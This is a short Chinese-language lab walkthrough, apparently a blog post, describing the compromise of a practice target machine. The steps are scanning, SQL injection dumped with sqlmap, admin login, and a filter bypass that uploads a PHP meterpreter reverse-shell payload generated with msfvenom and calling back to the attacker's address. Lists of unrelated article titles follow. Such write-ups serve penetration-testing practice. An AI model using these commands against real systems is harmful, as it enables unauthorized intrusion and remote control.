攻击机:192.168.32.152

靶机 :192.168.32.157

扫描靶机扫端口:

开放了ssh和80
看下ssh版本有没有漏洞,searchsplot下,没有发现

dirb扫描下目录,有个admin的打开

进入到一个登录界面,随时试了几个弱口令,不行

用扫描器吧,打开owasp zap扫一下

直接扫到了一个注入点  http://192.168.32.157/cat.php?id=3 ,直接sqlmap跑一下

存在注入,那么直接,爆库,爆字段,爆关键字,发现了password:

登进来了
找到一个上传点

再制作一个webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.32.152 lport=4444 -f raw

上传时发现文件名不能包含php,那就改成PHP即可

上传成功后,再用msf监听端口,拿到shell

最新文章

  1. microsoft office professional plus2013激活
  2. CSS hack技巧大全
  3. 常用git命令纪录
  4. bindOrg函数
  5. 让 jQuery UI draggable 适配移动端
  6. Python学习【第二篇】Python入门
  7. lua if
  8. T4自动生成数据库C#实体类学习(1)
  9. FLASH CC 2015 CANVAS 中 gotoAndStop、gotoAndPlay() 不起作用
  10. scala学习笔记(3):类
  11. zigbee
  12. ISO/IEC 14443协议浅谈
  13. redis内存管理代码的目光
  14. Spring MVC之Action输入参数
  15. [ Android 五种数据存储方式之二 ] —— 文件存储数据
  16. 《c++ concurrency in action》读书笔记1
  17. 【Java】 剑指offer(43) 从1到n整数中1出现的次数
  18. 对jQuery ajax的认识
  19. zeppelin中运行spark streaming kakfa & 实时可视化
  20. MyBatis原理第四篇——statementHandler对象(sqlSession内部核心实现,插件的基础)

热门文章

  1. usb驱动正在使用不能卸载
  2. Katalon Studio入门学习之三种获取元素方式
  3. python web开发中跨域问题的解决思路
  4. SP Flash Tool版本对应MTK处理器型号速查(SP Flash Tool Download)
  5. File类、FileInfo类、Directory类、DirectoryInfo类
  6. Angular 文档中链接的修改路径
  7. CSP-S2 游记
  8. 16位masm汇编实现记忆化递归搜索斐波那契数列第50项
  9. AtCoder4351 Median of Medians 二分, 树状数组
  10. TC-SRM391-div2-SortingGame(BFS,STL)